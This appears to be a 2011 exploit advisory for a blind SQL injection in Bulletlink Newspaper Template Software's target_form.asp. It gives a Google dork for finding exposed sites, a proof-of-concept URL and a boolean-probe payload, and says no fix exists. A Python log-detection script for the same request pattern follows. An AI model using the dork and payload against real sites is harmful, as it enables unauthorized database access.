Bulletlink Newspaper Template Software 0day Blind SQL Injection Vulnerability
2011-09-12 18:15:03
# Exploit Title: Bulletlink Newspaper Template Software (target_form.asp) 0day Blind SQL-Injection
# Date: 09/11/2011
# Author: easypwn
# Vendor or Software Link: http://www.bulletlink.com
# Category: webapps
# Google dork: allinurl:target_form.asp?pform=
# Tested on: Windows 2000, Windows 2003, Windows 2008. (Microsoft SQL Server)
PoC: http://localhost/target_form.asp?pform={{DeleteMember}}'SQLi
Demo: http://localhost/target_form.asp?pform={{DeleteMember}}'%20AND%208589=8589%20AND%20'pRKy'='pRKy
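A detection sketch for the request pattern in the PoC and Demo URLs above, added here as an example and not part of the original advisory: it flags `pform` values on `target_form.asp` that are not a single `{{Name}}` token. The expected value shape, the tag names and the two-field input format (URI stem, URI query) are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl

# Assumption: legitimate pform values are a single {{Name}} template token,
# the shape shown in the advisory's URLs.
EXPECTED = re.compile(r"\{\{\w+\}\}")
# Boolean probe: AND x=x or AND 'x'='x, the pattern in the advisory's Demo URL.
TAUTOLOGY = re.compile(r"\b(?:AND|OR)\s+('?)(\w+)\1\s*=\s*\1\2(?!\w)", re.I)

def classify(stem, query):
    """Return a list of finding tags for one request; empty means clean."""
    if not stem.lower().endswith("/target_form.asp"):
        return []
    findings = []
    # parse_qsl percent-decodes once and splits each pair on the first '='.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() != "pform" or EXPECTED.fullmatch(value):
            continue
        # Allow-list miss: reported even when no known pattern matches,
        # which also covers double-encoded input such as %2527.
        findings.append("unexpected-value")
        if "'" in value:
            findings.append("quote")
        if TAUTOLOGY.search(value):
            findings.append("boolean-probe")
    return findings

def scan(lines):
    """Scan 'uri-stem uri-query' lines; return (line_no, tags) for each hit."""
    hits = []
    for no, line in enumerate(lines, 1):
        stem, _, query = line.strip().partition(" ")
        tags = classify(stem, query)
        if tags:
            hits.append((no, tags))
    return hits

# Constructed sample input (stem and query fields only), not real log data.
SAMPLE = [
    "/target_form.asp pform={{DeleteMember}}",
    "/target_form.asp pform={{DeleteMember}}'%20AND%208589=8589%20AND%20'pRKy'='pRKy",
    "/target_form.asp pform={{DeleteMember}}'SQLi",
    "/news.asp id=12",
]

if __name__ == "__main__":
    for no, tags in scan(SAMPLE):
        print(no, ",".join(tags))
```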
Fixes
No fixes